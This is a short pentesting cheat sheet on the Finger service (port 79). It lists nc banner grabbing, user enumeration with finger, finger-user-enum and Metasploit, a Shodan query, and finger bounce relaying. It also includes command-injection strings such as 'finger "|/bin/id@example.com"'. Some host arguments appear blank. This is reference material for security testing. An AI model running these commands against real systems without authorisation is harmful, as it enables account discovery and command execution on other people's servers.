# 79 - Pentesting Finger ## **Basic Info** **Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files. **Default port:** 79 ```text PORT STATE SERVICE 79/tcp open finger ``` ## **Enumeration** ### **Banner Grabbing/Basic connection** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **User enumeration** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap execute a script for doing using default scripts** ### Metasploit uses more tricks than Nmap ```text use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## Command execution ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) ```text finger user@host@victim finger @internal@external ```